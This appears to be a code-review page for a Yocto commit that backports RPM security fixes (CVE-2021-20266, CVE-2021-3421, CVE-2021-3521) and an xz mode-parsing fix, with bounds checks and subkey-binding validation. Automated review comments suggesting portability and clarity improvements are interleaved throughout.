41+ * If we get into situation that one thread requires more virtual memory 44+ * If we get into situation that one thread requires more virtual memory
42+ * than available we set one thread, print error message and try anyway. */ 45+ * than available we set one thread, print error message and try anyway. */
43+ if (--mt_options.threads == 0) { 46+ if ((--mt_options.threads == 0) || (memory_usage_virt == UINT64_MAX)) {
44+ mt_options.threads = 1; 47+ mt_options.threads = 1;
45+ rpmlog(RPMLOG_WARNING, 48+ rpmlog(RPMLOG_WARNING,
46+ "XZ: Could not adjust number of threads to get below " 49+ "XZ: Could not adjust number of threads to get below "
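Review bot: The `rpmlog()` call in this hunk prints `virtual_memlimit` and `virtual_memlimit_per_cpu_thread`, both declared `const uint64_t`, with `%lu`, which is a mismatch on any target where `unsigned long` is 32 bits wide. The update hardens the code around it but leaves this format string as it was. The `<inttypes.h>` macros make it portable: `"XZ: virtual memory restricted to %" PRIu64 " and per CPU thread %" PRIu64 "\n"`. The enclosing `lzopen_internal()` starts and ends outside the hunk, so whether `<inttypes.h>` is already included cannot be seen from here.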
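--- /dev/null
+++ b/meta/recipes-devtools/rpm/files/0001-rpmio-Fix-lzopen_internal-mode-parsing-when-Tn-is-us.patch
@@ -0,0 +1,34 @@
+From 405fc8998181353bd510864ca251dc233afec276 Mon Sep 17 00:00:00 2001
+From: Vitaly Chikunov <vt@altlinux.org>
+Date: Wed, 6 Jan 2021 23:43:41 +0300
+Subject: [PATCH] rpmio: Fix lzopen_internal mode parsing when 'Tn' is used
+
+When there is number after "T" (suggested number of threads or "0" for
+getncpus), lzopen_internal() mode parser would skip one byte, and when
+it's at the end of the string it would then parse undesired garbage from
+the memory, making intermittent compression failures.
+
+Fixes: 7740d1098 ("Add support for multithreaded xz compression")
+Signed-off-by: Vitaly Chikunov <vt@altlinux.org>
+
+Upstream-Status: Backport [https://github.com/rpm-software-management/rpm/commit/405fc8998181353bd510864ca251dc233afec276]
+
+---
+ rpmio/rpmio.c | 1 +
+ 1 file changed, 1 insertion(+)
+
+diff --git a/rpmio/rpmio.c b/rpmio/rpmio.c
+index ed1e25140..9d32ec6d9 100644
+--- a/rpmio/rpmio.c
++++ b/rpmio/rpmio.c
+@@ -798,6 +798,7 @@ static LZFILE *lzopen_internal(const char *mode, int fd, int xz)
+ * should've processed
+ * */
+ while (isdigit(*++mode));
++ --mode;
+ }
+ #ifdef HAVE_LZMA_MT
+ else
+--
+2.25.1
+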
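Review bot: `isdigit(*++mode)` on the context line just above the added `--mode;` passes a plain `char`, which is undefined for negative values where `char` is signed; `while (isdigit((unsigned char)*++mode));` avoids that. The added decrement presumably relies on the enclosing loop advancing `mode` again, but that loop is outside the hunk. A short comment on the new line, such as `/* step back so the enclosing loop's increment lands on the next mode character */`, would make the pairing explicit.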
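--- /dev/null
+++ b/meta/recipes-devtools/rpm/files/CVE-2021-20266.patch
@@ -0,0 +1,109 @@
+From ebbf0f0133c498d229e94ecf2ed0b41d6e6a142a Mon Sep 17 00:00:00 2001
+From: Demi Marie Obenour <athena@invisiblethingslab.com>
+Date: Mon, 8 Feb 2021 16:05:01 -0500
+Subject: [PATCH] hdrblobInit() needs bounds checks too
+
+Users can pass untrusted data to hdrblobInit() and it must be robust
+against this.
+
+Backported from commit 8f4b3c3cab8922a2022b9e47c71f1ecf906077ef
+
+Upstream-Status: Backport [https://github.com/rpm-software-management/rpm/pull/1587/commits/9646711891df851dfbf7ef54cc171574a0914b15]
+CVE: CVE-2021-20266
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ lib/header.c | 48 +++++++++++++++++++++++++++++++-----------------
+ 1 file changed, 31 insertions(+), 17 deletions(-)
+
+diff --git a/lib/header.c b/lib/header.c
+index 5b09f8352..ad5b6dc57 100644
+--- a/lib/header.c
++++ b/lib/header.c
+@@ -11,6 +11,7 @@
+ #include "system.h"
+ #include <netdb.h>
+ #include <errno.h>
++#include <inttypes.h>
+ #include <rpm/rpmtypes.h>
+ #include <rpm/rpmstring.h>
+ #include "lib/header_internal.h"
+@@ -1890,6 +1891,25 @@ hdrblob hdrblobFree(hdrblob blob)
+ return NULL;
+ }
+
++static rpmRC hdrblobVerifyLengths(rpmTagVal regionTag, uint32_t il, uint32_t dl,
++ char **emsg) {
++ uint32_t il_max = HEADER_TAGS_MAX;
++ uint32_t dl_max = HEADER_DATA_MAX;
++ if (regionTag == RPMTAG_HEADERSIGNATURES) {
++ il_max = 32;
++ dl_max = 8192;
++ }
++ if (hdrchkRange(il_max, il)) {
++ rasprintf(emsg, _("hdr tags: BAD, no. of tags(%" PRIu32 ") out of range"), il);
++ return RPMRC_FAIL;
++ }
++ if (hdrchkRange(dl_max, dl)) {
++ rasprintf(emsg, _("hdr data: BAD, no. of bytes(%" PRIu32 ") out of range"), dl);
++ return RPMRC_FAIL;
++ }
++ return RPMRC_OK;
++}
++
+ rpmRC hdrblobRead(FD_t fd, int magic, int exact_size, rpmTagVal regionTag, hdrblob blob, char **emsg)
+ {
+ int32_t block[4];
+@@ -1902,13 +1922,6 @@ rpmRC hdrblobRead(FD_t fd, int magic, int exact_size, rpmTagVal regionTag, hdrbl
+ size_t nb;
+ rpmRC rc = RPMRC_FAIL; /* assume failure */
+ int xx;
+- int32_t il_max = HEADER_TAGS_MAX;
+- int32_t dl_max = HEADER_DATA_MAX;
+-
+- if (regionTag == RPMTAG_HEADERSIGNATURES) {
+- il_max = 32;
+- dl_max = 8192;
+- }
+
+ memset(block, 0, sizeof(block));
+ if ((xx = Freadall(fd, bs, blen)) != blen) {
+@@ -1921,15 +1934,9 @@ rpmRC hdrblobRead(FD_t fd, int magic, int exact_size, rpmTagVal regionTag, hdrbl
+ goto exit;
+ }
+ il = ntohl(block[2]);
+- if (hdrchkRange(il_max, il)) {
+- rasprintf(emsg, _("hdr tags: BAD, no. of tags(%d) out of range"), il);
+- goto exit;
+- }
+ dl = ntohl(block[3]);
+- if (hdrchkRange(dl_max, dl)) {
+- rasprintf(emsg, _("hdr data: BAD, no. of bytes(%d) out of range"), dl);
++ if (hdrblobVerifyLengths(regionTag, il, dl, emsg))
+ goto exit;
+- }
+
+ nb = (il * sizeof(struct entryInfo_s)) + dl;
+ uc = sizeof(il) + sizeof(dl) + nb;
+@@ -1973,11 +1980,18 @@ rpmRC hdrblobInit(const void *uh, size_t uc,
+ struct hdrblob_s *blob, char **emsg)
+ {
+ rpmRC rc = RPMRC_FAIL;
+-
+ memset(blob, 0, sizeof(*blob));
++ if (uc && uc < 8) {
++ rasprintf(emsg, _("hdr length: BAD"));
++ goto exit;
++ }
++
+ blob->ei = (int32_t *) uh; /* discards const */
+- blob->il = ntohl(blob->ei[0]);
+- blob->dl = ntohl(blob->ei[1]);
++ blob->il = ntohl((uint32_t)(blob->ei[0]));
++ blob->dl = ntohl((uint32_t)(blob->ei[1]));
++ if (hdrblobVerifyLengths(regionTag, blob->il, blob->dl, emsg) != RPMRC_OK)
++ goto exit;
++
+ blob->pe = (entryInfo) &(blob->ei[2]);
+ blob->pvlen = sizeof(blob->il) + sizeof(blob->dl) +
+ (blob->il * sizeof(*blob->pe)) + blob->dl;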
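Review bot: In `hdrblobInit()` the new guard `if (uc && uc < 8)` is skipped when `uc` is 0, and `blob->ei[0]` and `blob->ei[1]` are then read with no known length for `uh`. If 0 is meant as "size not supplied, the caller vouches for the buffer", that contract deserves a comment at the guard, for example `/* uc == 0: size not supplied by caller, only the il/dl ranges can be checked */`; otherwise the test should be `if (uc < 8)`. The literal 8 appears to stand for the two length words and would read better as `sizeof(blob->il) + sizeof(blob->dl)`, the expression the `pvlen` computation below already uses. The two call sites also test the helper differently (`if (hdrblobVerifyLengths(...))` in `hdrblobRead()`, `!= RPMRC_OK` here); the explicit comparison is the clearer of the two. `hdrblobInit()` continues past the end of the hunk.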
diff --git a/meta/recipes-devtools/rpm/files/CVE-2021-3421.patch b/meta/recipes-devtools/rpm/files/CVE-2021-3421.patch
new file mode 100644
index 0000000000..b1a05b6863
--- /dev/null
+++ b/meta/recipes-devtools/rpm/files/CVE-2021-3421.patch
@@ -0,0 +1,197 @@
1From 1e5b70cab83c95aa138107a38ecda75ff70e8985 Mon Sep 17 00:00:00 2001
2From: Minjae Kim <flowergom@gmail.com>
3Date: Thu, 24 Jun 2021 01:11:26 +0000
4Subject: [PATCH] Be much more careful about copying data from the signature
5 header
6
7Only look for known tags, and ensure correct type and size where known
8before copying over. Bump the old arbitrary 16k count limit to 16M limit
9though, it's not inconceivable that a package could have that many files.
10While at it, ensure none of these tags exist in the main header,
11which would confuse us greatly.
12
13This is optimized for backporting ease, upstream can remove redundancies
14and further improve checking later.
15
16Reported and initial patches by Demi Marie Obenour.
17
18Fixes: RhBug:1935049, RhBug:1933867, RhBug:1935035, RhBug:1934125, ...
19
20Fixes: CVE-2021-3421, CVE-2021-20271
21
22Upstream-Status: Backport [https://github.com/rpm-software-management/rpm/commit/d6a86b5e69e46cc283b1e06c92343319beb42e21]
23CVE: CVE-2021-3421
24Signed-off-by: Minjae Kim <flowergom@gmail.com>
25---
26 lib/package.c | 115 ++++++++++++++++++++++++--------------------------
27 lib/rpmtag.h | 4 ++
28 2 files changed, 58 insertions(+), 61 deletions(-)
29
30diff --git a/lib/package.c b/lib/package.c
31index 081123d84e..7c26ea323f 100644
32--- a/lib/package.c
33+++ b/lib/package.c
34@@ -20,76 +20,68 @@
35
36 #include "debug.h"
37
38+struct taglate_s {
39+ rpmTagVal stag;
40+ rpmTagVal xtag;
41+ rpm_count_t count;
42+} const xlateTags[] = {
43+ { RPMSIGTAG_SIZE, RPMTAG_SIGSIZE, 1 },
44+ { RPMSIGTAG_PGP, RPMTAG_SIGPGP, 0 },
45+ { RPMSIGTAG_MD5, RPMTAG_SIGMD5, 16 },
46+ { RPMSIGTAG_GPG, RPMTAG_SIGGPG, 0 },
47+ /* { RPMSIGTAG_PGP5, RPMTAG_SIGPGP5, 0 }, */ /* long obsolete, dont use */
48+ { RPMSIGTAG_PAYLOADSIZE, RPMTAG_ARCHIVESIZE, 1 },
49+ { RPMSIGTAG_FILESIGNATURES, RPMTAG_FILESIGNATURES, 0 },
50+ { RPMSIGTAG_FILESIGNATURELENGTH, RPMTAG_FILESIGNATURELENGTH, 1 },
51+ { RPMSIGTAG_SHA1, RPMTAG_SHA1HEADER, 1 },
52+ { RPMSIGTAG_SHA256, RPMTAG_SHA256HEADER, 1 },
53+ { RPMSIGTAG_DSA, RPMTAG_DSAHEADER, 0 },
54+ { RPMSIGTAG_RSA, RPMTAG_RSAHEADER, 0 },
55+ { RPMSIGTAG_LONGSIZE, RPMTAG_LONGSIGSIZE, 1 },
56+ { RPMSIGTAG_LONGARCHIVESIZE, RPMTAG_LONGARCHIVESIZE, 1 },
57+ { 0 }
58+};
59+
60 /** \ingroup header
61 * Translate and merge legacy signature tags into header.
62 * @param h header (dest)
63 * @param sigh signature header (src)
64 */
65 static
66-void headerMergeLegacySigs(Header h, Header sigh)
67+rpmTagVal headerMergeLegacySigs(Header h, Header sigh, char **msg)
68 {
69- HeaderIterator hi;
70+ const struct taglate_s *xl;
71 struct rpmtd_s td;
72
73- hi = headerInitIterator(sigh);
74- for (; headerNext(hi, &td); rpmtdFreeData(&td))
75- {
76- switch (td.tag) {
77- /* XXX Translate legacy signature tag values. */
78- case RPMSIGTAG_SIZE:
79- td.tag = RPMTAG_SIGSIZE;
80- break;
81- case RPMSIGTAG_PGP:
82- td.tag = RPMTAG_SIGPGP;
83- break;
84- case RPMSIGTAG_MD5:
85- td.tag = RPMTAG_SIGMD5;
86- break;
87- case RPMSIGTAG_GPG:
88- td.tag = RPMTAG_SIGGPG;
89- break;
90- case RPMSIGTAG_PGP5:
91- td.tag = RPMTAG_SIGPGP5;
92- break;
93- case RPMSIGTAG_PAYLOADSIZE:
94- td.tag = RPMTAG_ARCHIVESIZE;
95- break;
96- case RPMSIGTAG_SHA1:
97- case RPMSIGTAG_SHA256:
98- case RPMSIGTAG_DSA:
99- case RPMSIGTAG_RSA:
100- default:
101- if (!(td.tag >= HEADER_SIGBASE && td.tag < HEADER_TAGBASE))
102- continue;
103- break;
104- }
105- if (!headerIsEntry(h, td.tag)) {
106- switch (td.type) {
107- case RPM_NULL_TYPE:
108- continue;
109- break;
110- case RPM_CHAR_TYPE:
111- case RPM_INT8_TYPE:
112- case RPM_INT16_TYPE:
113- case RPM_INT32_TYPE:
114- case RPM_INT64_TYPE:
115- if (td.count != 1)
116- continue;
117- break;
118- case RPM_STRING_TYPE:
119- case RPM_BIN_TYPE:
120- if (td.count >= 16*1024)
121- continue;
122- break;
123- case RPM_STRING_ARRAY_TYPE:
124- case RPM_I18NSTRING_TYPE:
125- continue;
126- break;
127- }
128- (void) headerPut(h, &td, HEADERPUT_DEFAULT);
129- }
130+ rpmtdReset(&td);
131+ for (xl = xlateTags; xl->stag; xl++) {
132+ /* There mustn't be one in the main header */
133+ if (headerIsEntry(h, xl->xtag))
134+ break;
135+ if (headerGet(sigh, xl->stag, &td, HEADERGET_RAW|HEADERGET_MINMEM)) {
136+ /* Translate legacy tags */
137+ if (xl->stag != xl->xtag)
138+ td.tag = xl->xtag;
139+ /* Ensure type and tag size match expectations */
140+ if (td.type != rpmTagGetTagType(td.tag))
141+ break;
142+ if (td.count < 1 || td.count > 16*1024*1024)
143+ break;
144+ if (xl->count && td.count != xl->count)
145+ break;
146+ if (!headerPut(h, &td, HEADERPUT_DEFAULT))
147+ break;
148+ rpmtdFreeData(&td);
149+ }
150+ }
151+ rpmtdFreeData(&td);
152+
153+ if (xl->stag) {
154+ rasprintf(msg, "invalid signature tag %s (%d)",
155+ rpmTagGetName(xl->xtag), xl->xtag);
156 }
157- headerFreeIterator(hi);
158+
159+ return xl->stag;
160 }
161
162 /**
163@@ -337,7 +329,8 @@ rpmRC rpmReadPackageFile(rpmts ts, FD_t fd, const char * fn, Header * hdrp)
164 goto exit;
165
166 /* Append (and remap) signature tags to the metadata. */
167- headerMergeLegacySigs(h, sigh);
168+ if (headerMergeLegacySigs(h, sigh,&msg))
169+ goto exit;
170 applyRetrofits(h);
171
172 /* Bump reference count for return. */
173diff --git a/lib/rpmtag.h b/lib/rpmtag.h
174index 8c718b31b5..d562572c6f 100644
175--- a/lib/rpmtag.h
176+++ b/lib/rpmtag.h
177@@ -65,6 +65,8 @@ typedef enum rpmTag_e {
178 RPMTAG_LONGARCHIVESIZE = RPMTAG_SIG_BASE+15, /* l */
179 /* RPMTAG_SIG_BASE+16 reserved */
180 RPMTAG_SHA256HEADER = RPMTAG_SIG_BASE+17, /* s */
181+ /* RPMTAG_SIG_BASE+18 reserved for RPMSIGTAG_FILESIGNATURES */
182+ /* RPMTAG_SIG_BASE+19 reserved for RPMSIGTAG_FILESIGNATURELENGTH */
183
184 RPMTAG_NAME = 1000, /* s */
185 #define RPMTAG_N RPMTAG_NAME /* s */
186@@ -422,6 +424,8 @@ typedef enum rpmSigTag_e {
187 RPMSIGTAG_LONGSIZE = RPMTAG_LONGSIGSIZE, /*!< internal Header+Payload size (64bit) in bytes. */
188 RPMSIGTAG_LONGARCHIVESIZE = RPMTAG_LONGARCHIVESIZE, /*!< internal uncompressed payload size (64bit) in bytes. */
189 RPMSIGTAG_SHA256 = RPMTAG_SHA256HEADER,
190+ RPMSIGTAG_FILESIGNATURES = RPMTAG_SIG_BASE + 18,
191+ RPMSIGTAG_FILESIGNATURELENGTH = RPMTAG_SIG_BASE + 19,
192 } rpmSigTag;
193
194
195--
1962.17.1
197
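Review bot: `headerMergeLegacySigs()` in lib/package.c now returns `rpmTagVal` and takes `char **msg`, but the doc comment above it still lists only `h` and `sigh`. I would add ` * @retval msg	failure message` and ` * @return		0 on success, offending signature tag otherwise`, which is what `return xl->stag;` yields given the `{ 0 }` table terminator. The same "invalid signature tag" text is produced for every `break`, including the case where the tag already exists in the main header and the case where `headerPut()` fails, so the message cannot distinguish a malformed signature header from a conflicting main header. At the call site in `rpmReadPackageFile()` the new `goto exit` depends on `rc` already holding a failure value, which the hunk does not show.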
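--- /dev/null
+++ b/meta/recipes-devtools/rpm/files/CVE-2021-3521-01.patch
@@ -0,0 +1,60 @@
+From b5e8bc74b2b05aa557f663fe227b94d2bc64fbd8 Mon Sep 17 00:00:00 2001
+From: Panu Matilainen <pmatilai@redhat.com>
+Date: Thu, 30 Sep 2021 09:51:10 +0300
+Subject: [PATCH] Process MPI's from all kinds of signatures
+
+No immediate effect but needed by the following commits.
+
+Dependent patch:
+CVE: CVE-2021-3521
+Upstream-Status: Backport [https://github.com/rpm-software-management/rpm/commit/b5e8bc74b2b05aa557f663fe227b94d2bc64fbd8]
+Signed-off-by: Riyaz Khan <Riyaz.Khan@kpit.com>
+
+---
+ rpmio/rpmpgp.c | 12 +++++-------
+ 1 file changed, 5 insertions(+), 7 deletions(-)
+
+diff --git a/rpmio/rpmpgp.c b/rpmio/rpmpgp.c
+index ee5c81e246..340de5fc9a 100644
+--- a/rpmio/rpmpgp.c
++++ b/rpmio/rpmpgp.c
+@@ -511,7 +511,7 @@ pgpDigAlg pgpDigAlgFree(pgpDigAlg alg)
+ return NULL;
+ }
+
+-static int pgpPrtSigParams(pgpTag tag, uint8_t pubkey_algo, uint8_t sigtype,
++static int pgpPrtSigParams(pgpTag tag, uint8_t pubkey_algo,
+ const uint8_t *p, const uint8_t *h, size_t hlen,
+ pgpDigParams sigp)
+ {
+@@ -524,10 +524,8 @@ static int pgpPrtSigParams(pgpTag tag, uint8_t pubkey_algo, uint8_t sigtype,
+ int mpil = pgpMpiLen(p);
+ if (p + mpil > pend)
+ break;
+- if (sigtype == PGPSIGTYPE_BINARY || sigtype == PGPSIGTYPE_TEXT) {
+- if (sigalg->setmpi(sigalg, i, p))
+- break;
+- }
++ if (sigalg->setmpi(sigalg, i, p))
++ break;
+ p += mpil;
+ }
+
+@@ -600,7 +598,7 @@ static int pgpPrtSig(pgpTag tag, const uint8_t *h, size_t hlen,
+ }
+
+ p = ((uint8_t *)v) + sizeof(*v);
+- rc = pgpPrtSigParams(tag, v->pubkey_algo, v->sigtype, p, h, hlen, _digp);
++ rc = pgpPrtSigParams(tag, v->pubkey_algo, p, h, hlen, _digp);
+ } break;
+ case 4:
+ { pgpPktSigV4 v = (pgpPktSigV4)h;
+@@ -658,7 +656,7 @@ static int pgpPrtSig(pgpTag tag, const uint8_t *h, size_t hlen,
+ if (p > (h + hlen))
+ return 1;
+
+- rc = pgpPrtSigParams(tag, v->pubkey_algo, v->sigtype, p, h, hlen, _digp);
++ rc = pgpPrtSigParams(tag, v->pubkey_algo, p, h, hlen, _digp);
+ } break;
+ default:
+ rpmlog(RPMLOG_WARNING, _("Unsupported version of key: V%d\n"), version);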
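Review bot: With the `sigtype` filter removed, `sigalg->setmpi()` now runs on the MPIs of every signature type, so the bounds test just above it carries more weight, and `if (p + mpil > pend)` forms a pointer that may lie past the buffer before it is compared. Comparing lengths keeps the arithmetic in range: `if (mpil > pend - p) break;`. `pgpMpiLen(p)` is also called before any visible check that the length prefix itself lies before `pend`. The loop header is outside the hunk, so that may already be covered there.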
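--- /dev/null
+++ b/meta/recipes-devtools/rpm/files/CVE-2021-3521-02.patch
@@ -0,0 +1,55 @@
+From 9f03f42e2614a68f589f9db8fe76287146522c0c Mon Sep 17 00:00:00 2001
+From: Panu Matilainen <pmatilai@redhat.com>
+Date: Thu, 30 Sep 2021 09:56:20 +0300
+Subject: [PATCH] Refactor pgpDigParams construction to helper function
+
+No functional changes, just to reduce code duplication and needed by
+the following commits.
+
+Dependent patch:
+CVE: CVE-2021-3521
+Upstream-Status: Backport [https://github.com/rpm-software-management/rpm/commit/9f03f42e2614a68f589f9db8fe76287146522c0c]
+Signed-off-by: Riyaz Khan <Riyaz.Khan@kpit.com>
+
+---
+ rpmio/rpmpgp.c | 13 +++++++++----
+ 1 file changed, 9 insertions(+), 4 deletions(-)
+
+diff --git a/rpmio/rpmpgp.c b/rpmio/rpmpgp.c
+index 340de5fc9a..aad7c275c9 100644
+--- a/rpmio/rpmpgp.c
++++ b/rpmio/rpmpgp.c
+@@ -1055,6 +1055,13 @@ unsigned int pgpDigParamsAlgo(pgpDigParams digp, unsigned int algotype)
+ return algo;
+ }
+
++static pgpDigParams pgpDigParamsNew(uint8_t tag)
++{
++ pgpDigParams digp = xcalloc(1, sizeof(*digp));
++ digp->tag = tag;
++ return digp;
++}
++
+ int pgpPrtParams(const uint8_t * pkts, size_t pktlen, unsigned int pkttype,
+ pgpDigParams * ret)
+ {
+@@ -1072,8 +1079,7 @@ int pgpPrtParams(const uint8_t * pkts, size_t pktlen, unsigned int pkttype,
+ if (pkttype && pkt.tag != pkttype) {
+ break;
+ } else {
+- digp = xcalloc(1, sizeof(*digp));
+- digp->tag = pkt.tag;
++ digp = pgpDigParamsNew(pkt.tag);
+ }
+ }
+
+@@ -1121,8 +1127,7 @@ int pgpPrtParamsSubkeys(const uint8_t *pkts, size_t pktlen,
+ digps = xrealloc(digps, alloced * sizeof(*digps));
+ }
+
+- digps[count] = xcalloc(1, sizeof(**digps));
+- digps[count]->tag = PGPTAG_PUBLIC_SUBKEY;
++ digps[count] = pgpDigParamsNew(PGPTAG_PUBLIC_SUBKEY);
+ /* Copy UID from main key to subkey */
+ digps[count]->userid = xstrdup(mainkey->userid);
+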
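--- /dev/null
+++ b/meta/recipes-devtools/rpm/files/CVE-2021-3521-03.patch
@@ -0,0 +1,34 @@
+From 5ff86764b17f31535cb247543a90dd739076ec38 Mon Sep 17 00:00:00 2001
+From: Demi Marie Obenour <demi@invisiblethingslab.com>
+Date: Thu, 6 May 2021 18:34:45 -0400
+Subject: [PATCH] Do not allow extra packets to follow a signature
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+According to RFC 4880 § 11.4, a detached signature is “simply a
+Signature packet”. Therefore, extra packets following a detached
+signature are not allowed.
+
+Dependent patch:
+CVE: CVE-2021-3521
+Upstream-Status: Backport [https://github.com/rpm-software-management/rpm/commit/5ff86764b17f31535cb247543a90dd739076ec38]
+Signed-off-by: Riyaz Khan <Riyaz.Khan@kpit.com>
+
+---
+ rpmio/rpmpgp.c | 2 ++
+ 1 file changed, 2 insertions(+)
+
+diff --git a/rpmio/rpmpgp.c b/rpmio/rpmpgp.c
+index f1a99e7169..5b346a8253 100644
+--- a/rpmio/rpmpgp.c
++++ b/rpmio/rpmpgp.c
+@@ -1068,6 +1068,8 @@ int pgpPrtParams(const uint8_t * pkts, size_t pktlen, unsigned int pkttype,
+ break;
+
+ p += (pkt.body - pkt.head) + pkt.blen;
++ if (pkttype == PGPTAG_SIGNATURE)
++ break;
+ }
+
+ rc = (digp && (p == pend)) ? 0 : -1;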
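Review bot: The two added lines in pgpPrtParams() (patch lines 30-31) carry no comment, and the early `break` reads like a success path although it is the `p == pend` test on patch line 34 that actually rejects a signature followed by further packets. A short comment would make that dependency explicit, e.g. `/* a detached signature is exactly one packet; stop so the p == pend check below fails on trailing data */`. pgpPrtParams() starts and ends outside this hunk, so how `rc` is consumed afterwards is not visible here.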
diff --git a/meta/recipes-devtools/rpm/files/CVE-2021-3521.patch b/meta/recipes-devtools/rpm/files/CVE-2021-3521.patch
new file mode 100644
index 0000000000..cb9e9842fe
--- /dev/null
+++ b/meta/recipes-devtools/rpm/files/CVE-2021-3521.patch
@@ -0,0 +1,330 @@
1From bd36c5dc9fb6d90c46fbfed8c2d67516fc571ec8 Mon Sep 17 00:00:00 2001
2From: Panu Matilainen <pmatilai@redhat.com>
3Date: Thu, 30 Sep 2021 09:59:30 +0300
4Subject: [PATCH] Validate and require subkey binding signatures on PGP public
5 keys
6
7All subkeys must be followed by a binding signature by the primary key
8as per the OpenPGP RFC, enforce the presence and validity in the parser.
9
10The implementation is as kludgey as they come to work around our
11simple-minded parser structure without touching API, to maximise
12backportability. Store all the raw packets internally as we decode them
13to be able to access previous elements at will, needed to validate ordering
14and access the actual data. Add testcases for manipulated keys whose
15import previously would succeed.
16
17Depends on the two previous commits:
187b399fcb8f52566e6f3b4327197a85facd08db91 and
19236b802a4aa48711823a191d1b7f753c82a89ec5
20
21CVE: CVE-2021-3521
22Upstream-Status: Backport [https://github.com/rpm-software-management/rpm/commit/bd36c5dc9fb6d90c46fbfed8c2d67516fc571ec8]
23Comment: Hunk refreshed
24Signed-off-by: Riyaz Khan <Riyaz.Khan@kpit.com>
25
26Fixes CVE-2021-3521.
27---
28 rpmio/rpmpgp.c | 98 +++++++++++++++++--
29 tests/Makefile.am | 3 +
30 tests/data/keys/CVE-2021-3521-badbind.asc | 25 +++++
31 .../data/keys/CVE-2021-3521-nosubsig-last.asc | 25 +++++
32 tests/data/keys/CVE-2021-3521-nosubsig.asc | 37 +++++++
33 tests/rpmsigdig.at | 28 ++++++
34 6 files changed, 209 insertions(+), 7 deletions(-)
35 create mode 100644 tests/data/keys/CVE-2021-3521-badbind.asc
36 create mode 100644 tests/data/keys/CVE-2021-3521-nosubsig-last.asc
37 create mode 100644 tests/data/keys/CVE-2021-3521-nosubsig.asc
38
39diff --git a/rpmio/rpmpgp.c b/rpmio/rpmpgp.c
40index aad7c275c9..d70802ae86 100644
41--- a/rpmio/rpmpgp.c
42+++ b/rpmio/rpmpgp.c
43@@ -1004,37 +1004,121 @@ static pgpDigParams pgpDigParamsNew(uint8_t tag)
44 return digp;
45 }
46
47+static int hashKey(DIGEST_CTX hash, const struct pgpPkt *pkt, int exptag)
48+{
49+ int rc = -1;
50+ if (pkt->tag == exptag) {
51+ uint8_t head[] = {
52+ 0x99,
53+ (pkt->blen >> 8),
54+ (pkt->blen ),
55+ };
56+
57+ rpmDigestUpdate(hash, head, 3);
58+ rpmDigestUpdate(hash, pkt->body, pkt->blen);
59+ rc = 0;
60+ }
61+ return rc;
62+}
63+
64+static int pgpVerifySelf(pgpDigParams key, pgpDigParams selfsig,
65+ const struct pgpPkt *all, int i)
66+{
67+ int rc = -1;
68+ DIGEST_CTX hash = NULL;
69+
70+ switch (selfsig->sigtype) {
71+ case PGPSIGTYPE_SUBKEY_BINDING:
72+ hash = rpmDigestInit(selfsig->hash_algo, 0);
73+ if (hash) {
74+ rc = hashKey(hash, &all[0], PGPTAG_PUBLIC_KEY);
75+ if (!rc)
76+ rc = hashKey(hash, &all[i-1], PGPTAG_PUBLIC_SUBKEY);
77+ }
78+ break;
79+ default:
80+ /* ignore types we can't handle */
81+ rc = 0;
82+ break;
83+ }
84+
85+ if (hash && rc == 0)
86+ rc = pgpVerifySignature(key, selfsig, hash);
87+
88+ rpmDigestFinal(hash, NULL, NULL, 0);
89+
90+ return rc;
91+}
92+
93 int pgpPrtParams(const uint8_t * pkts, size_t pktlen, unsigned int pkttype,
94 pgpDigParams * ret)
95 {
96 const uint8_t *p = pkts;
97 const uint8_t *pend = pkts + pktlen;
98 pgpDigParams digp = NULL;
99- struct pgpPkt pkt;
100+ pgpDigParams selfsig = NULL;
101+ int i = 0;
102+ int alloced = 16; /* plenty for normal cases */
103+ struct pgpPkt *all = xmalloc(alloced * sizeof(*all));
104 int rc = -1; /* assume failure */
105+ int expect = 0;
106+ int prevtag = 0;
107
108 while (p < pend) {
109- if (decodePkt(p, (pend - p), &pkt))
110+ struct pgpPkt *pkt = &all[i];
111+ if (decodePkt(p, (pend - p), pkt))
112 break;
113
114 if (digp == NULL) {
115- if (pkttype && pkt.tag != pkttype) {
116+ if (pkttype && pkt->tag != pkttype) {
117 break;
118 } else {
119- digp = pgpDigParamsNew(pkt.tag);
120+ digp = pgpDigParamsNew(pkt->tag);
121 }
122 }
123
124- if (pgpPrtPkt(&pkt, digp))
125+ if (expect) {
126+ if (pkt->tag != expect)
127+ break;
128+ selfsig = pgpDigParamsNew(pkt->tag);
129+ }
130+
131+ if (pgpPrtPkt(pkt, selfsig ? selfsig : digp))
132 break;
133
134- p += (pkt.body - pkt.head) + pkt.blen;
135+ if (selfsig) {
136+ /* subkeys must be followed by binding signature */
137+ if (prevtag == PGPTAG_PUBLIC_SUBKEY) {
138+ if (selfsig->sigtype != PGPSIGTYPE_SUBKEY_BINDING)
139+ break;
140+ }
141+
142+ int xx = pgpVerifySelf(digp, selfsig, all, i);
143+
144+ selfsig = pgpDigParamsFree(selfsig);
145+ if (xx)
146+ break;
147+ expect = 0;
148+ }
149+
150+ if (pkt->tag == PGPTAG_PUBLIC_SUBKEY)
151+ expect = PGPTAG_SIGNATURE;
152+ prevtag = pkt->tag;
153+
154+ i++;
155+ p += (pkt->body - pkt->head) + pkt->blen;
156 if (pkttype == PGPTAG_SIGNATURE)
157 break;
158+
159+ if (alloced <= i) {
160+ alloced *= 2;
161+ all = xrealloc(all, alloced * sizeof(*all));
162+ }
163 }
164
165- rc = (digp && (p == pend)) ? 0 : -1;
166+ rc = (digp && (p == pend) && expect == 0) ? 0 : -1;
167
168+ free(all);
169 if (ret && rc == 0) {
170 *ret = digp;
171 } else {
172diff --git a/tests/Makefile.am b/tests/Makefile.am
173index b4a2e2e1ce..bc535d2833 100644
174--- a/tests/Makefile.am
175+++ b/tests/Makefile.am
176@@ -87,6 +87,9 @@ EXTRA_DIST += data/SPECS/hello-config-buildid.spec
177 EXTRA_DIST += data/SPECS/hello-cd.spec
178 EXTRA_DIST += data/keys/rpm.org-rsa-2048-test.pub
179 EXTRA_DIST += data/keys/rpm.org-rsa-2048-test.secret
180+EXTRA_DIST += data/keys/CVE-2021-3521-badbind.asc
181+EXTRA_DIST += data/keys/CVE-2021-3521-nosubsig.asc
182+EXTRA_DIST += data/keys/CVE-2021-3521-nosubsig-last.asc
183 EXTRA_DIST += data/macros.testfile
184
185 # testsuite voodoo
186diff --git a/tests/data/keys/CVE-2021-3521-badbind.asc b/tests/data/keys/CVE-2021-3521-badbind.asc
187new file mode 100644
188index 0000000000..aea00f9d7a
189--- /dev/null
